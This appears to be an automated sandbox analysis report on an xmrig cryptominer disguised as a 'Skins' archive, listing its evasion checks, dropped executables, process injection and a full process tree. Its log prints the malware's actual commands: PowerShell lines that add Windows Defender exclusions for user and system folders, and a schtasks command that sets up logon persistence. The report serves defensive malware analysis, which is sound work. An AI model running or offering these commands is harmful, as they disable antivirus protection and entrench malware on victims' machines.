xmrig | hxxps://mega[.]nz/file/CRhR3SAQ#Xkl2x4uK5_6a4THO57I1jwiDQU1phf2gbJhzKq8sErw

Analysis

max time kernel
208s
max time network
176s
platform
windows10_x64
resource
win10-en-20210920
submitted
07-10-2021 12:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/CRhR3SAQ#Xkl2x4uK5_6a4THO57I1jwiDQU1phf2gbJhzKq8sErw
Sample

211007-prswaacfaq

Score

10^/10

xmrig evasion miner pyinstaller themida trojan

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1208-542-0x00000001402F327C-mapping.dmp	xmrig
behavioral1/memory/1208-548-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

Executes dropped EXE 7 IoCs

Processes:

GeneratePC.exesvchost64.exesystem32.exesvchost64.exesihost64.exeSkin.exeSkin.exe

pid process

2552 GeneratePC.exe
3640 svchost64.exe
3028 system32.exe
4020 svchost64.exe
4004 sihost64.exe
4056 Skin.exe
2180 Skin.exe

pid	process
2552	GeneratePC.exe
3640	svchost64.exe
3028	system32.exe
4020	svchost64.exe
4004	sihost64.exe
4056	Skin.exe
2180	Skin.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GeneratePC.exesystem32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GeneratePC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GeneratePC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	system32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	system32.exe

Loads dropped DLL 6 IoCs

Processes:

Skin.exe

pid process

2180 Skin.exe
2180 Skin.exe
2180 Skin.exe
2180 Skin.exe
2180 Skin.exe
2180 Skin.exe

pid	process
2180	Skin.exe
2180	Skin.exe
2180	Skin.exe
2180	Skin.exe
2180	Skin.exe
2180	Skin.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\New folder\GeneratePC.exe	themida
C:\Users\Admin\Desktop\New folder\GeneratePC.exe	themida
behavioral1/memory/2552-122-0x00007FF692490000-0x00007FF692491000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\system32.exe	themida
C:\Users\Admin\AppData\Local\Temp\system32.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

GeneratePC.exesystem32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GeneratePC.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	system32.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

GeneratePC.exesystem32.exe

pid process

2552 GeneratePC.exe
3028 system32.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost64.exe

description pid process target process

PID 4020 set thread context of 1208 4020 svchost64.exe explorer.exe

pid	process
2552	GeneratePC.exe
3028	system32.exe

description	pid	process	target process
PID 4020 set thread context of 1208	4020	svchost64.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

chrome.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Skin.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Инструкция.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\GeneratePC.exe	chrome.exe

Detects Pyinstaller 3 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\New folder\Skin.exe	pyinstaller
C:\Users\Admin\Desktop\New folder\Skin.exe	pyinstaller
C:\Users\Admin\Desktop\New folder\Skin.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1212 schtasks.exe
2184 schtasks.exe

pid	process
1212	schtasks.exe
2184	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 3 IoCs

Processes:

7zFM.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: 4 IoCs

Processes:

chrome.exe

pid process

2524 chrome.exe
2524 chrome.exe
2524 chrome.exe
2524 chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exeexplorer.exe

pid	process
1192	chrome.exe
1192	chrome.exe
2524	chrome.exe
2524	chrome.exe
1252	chrome.exe
1252	chrome.exe
1992	chrome.exe
1992	chrome.exe
3060	chrome.exe
3060	chrome.exe
3852	chrome.exe
3852	chrome.exe
1688	powershell.exe
1688	powershell.exe
1688	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
2376	powershell.exe
2376	powershell.exe
2376	powershell.exe
3492	powershell.exe
3492	powershell.exe
3492	powershell.exe
3640	svchost64.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
1176	powershell.exe
1176	powershell.exe
1176	powershell.exe
1200	powershell.exe
1200	powershell.exe
1200	powershell.exe
4020	svchost64.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe
1208	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

1676 7zFM.exe

pid	process
1676	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	1676	7zFM.exe
Token: 35	1676	7zFM.exe
Token: SeSecurityPrivilege	1676	7zFM.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeIncreaseQuotaPrivilege	1688	powershell.exe
Token: SeSecurityPrivilege	1688	powershell.exe
Token: SeTakeOwnershipPrivilege	1688	powershell.exe
Token: SeLoadDriverPrivilege	1688	powershell.exe
Token: SeSystemProfilePrivilege	1688	powershell.exe
Token: SeSystemtimePrivilege	1688	powershell.exe
Token: SeProfSingleProcessPrivilege	1688	powershell.exe
Token: SeIncBasePriorityPrivilege	1688	powershell.exe
Token: SeCreatePagefilePrivilege	1688	powershell.exe
Token: SeBackupPrivilege	1688	powershell.exe
Token: SeRestorePrivilege	1688	powershell.exe
Token: SeShutdownPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeSystemEnvironmentPrivilege	1688	powershell.exe
Token: SeRemoteShutdownPrivilege	1688	powershell.exe
Token: SeUndockPrivilege	1688	powershell.exe
Token: SeManageVolumePrivilege	1688	powershell.exe
Token: 33	1688	powershell.exe
Token: 34	1688	powershell.exe
Token: 35	1688	powershell.exe
Token: 36	1688	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeIncreaseQuotaPrivilege	3852	powershell.exe
Token: SeSecurityPrivilege	3852	powershell.exe
Token: SeTakeOwnershipPrivilege	3852	powershell.exe
Token: SeLoadDriverPrivilege	3852	powershell.exe
Token: SeSystemProfilePrivilege	3852	powershell.exe
Token: SeSystemtimePrivilege	3852	powershell.exe
Token: SeProfSingleProcessPrivilege	3852	powershell.exe
Token: SeIncBasePriorityPrivilege	3852	powershell.exe
Token: SeCreatePagefilePrivilege	3852	powershell.exe
Token: SeBackupPrivilege	3852	powershell.exe
Token: SeRestorePrivilege	3852	powershell.exe
Token: SeShutdownPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeSystemEnvironmentPrivilege	3852	powershell.exe
Token: SeRemoteShutdownPrivilege	3852	powershell.exe
Token: SeUndockPrivilege	3852	powershell.exe
Token: SeManageVolumePrivilege	3852	powershell.exe
Token: 33	3852	powershell.exe
Token: 34	3852	powershell.exe
Token: 35	3852	powershell.exe
Token: 36	3852	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeIncreaseQuotaPrivilege	2376	powershell.exe
Token: SeSecurityPrivilege	2376	powershell.exe
Token: SeTakeOwnershipPrivilege	2376	powershell.exe
Token: SeLoadDriverPrivilege	2376	powershell.exe
Token: SeSystemProfilePrivilege	2376	powershell.exe
Token: SeSystemtimePrivilege	2376	powershell.exe
Token: SeProfSingleProcessPrivilege	2376	powershell.exe
Token: SeIncBasePriorityPrivilege	2376	powershell.exe
Token: SeCreatePagefilePrivilege	2376	powershell.exe
Token: SeBackupPrivilege	2376	powershell.exe
Token: SeRestorePrivilege	2376	powershell.exe
Token: SeShutdownPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeSystemEnvironmentPrivilege	2376	powershell.exe
Token: SeRemoteShutdownPrivilege	2376	powershell.exe
Token: SeUndockPrivilege	2376	powershell.exe

Suspicious use of FindShellTrayWindow 38 IoCs

Processes:

chrome.exe7zFM.exe

pid	process
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
1676	7zFM.exe
1676	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe
2524	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2524 wrote to memory of 3964	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 3964	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1064	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1192	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1192	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe
PID 2524 wrote to memory of 1656	2524	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://mega.nz/file/CRhR3SAQ#Xkl2x4uK5_6a4THO57I1jwiDQU1phf2gbJhzKq8sErw
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior:
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7fffa0424f50,0x7fffa0424f60,0x7fffa0424f70
2⤵
PID:3964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1544 /prefetch:2
2⤵
PID:1064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1740 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2088 /prefetch:8
2⤵
PID:1656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
2⤵
PID:780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
2⤵
PID:3016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:8
2⤵
PID:3532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4748 /prefetch:8
2⤵
PID:1624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:8
2⤵
PID:1716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4420 /prefetch:8
2⤵
PID:1244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:8
2⤵
PID:2028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4416 /prefetch:8
2⤵
PID:3136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:8
2⤵
PID:2288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:8
2⤵
PID:3800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:8
2⤵
PID:1368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4512 /prefetch:8
2⤵
PID:2380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
2⤵
PID:3212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
2⤵
PID:3912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
2⤵
- Drops file in Program Files directory
PID:1252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4156 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,17089242612377556396,8373641971779927165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4628 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3852

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2460

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Skins.rar"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1676

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New folder\Инструкция.txt
1⤵
PID:3088

C:\Users\Admin\Desktop\New folder\GeneratePC.exe
"C:\Users\Admin\Desktop\New folder\GeneratePC.exe"
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2552

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2⤵
PID:3376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\Desktop\New folder\GeneratePC.exe"
2⤵
PID:3776

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\Desktop\New folder\GeneratePC.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3640

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system32" /tr '"C:\Users\Admin\AppData\Local\Temp\system32.exe"' & exit
4⤵
PID:3956

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system32" /tr '"C:\Users\Admin\AppData\Local\Temp\system32.exe"'
5⤵
- Creates scheduled task(s)
PID:1212

C:\Users\Admin\AppData\Local\Temp\system32.exe
"C:\Users\Admin\AppData\Local\Temp\system32.exe"
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3028

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
5⤵
PID:2752

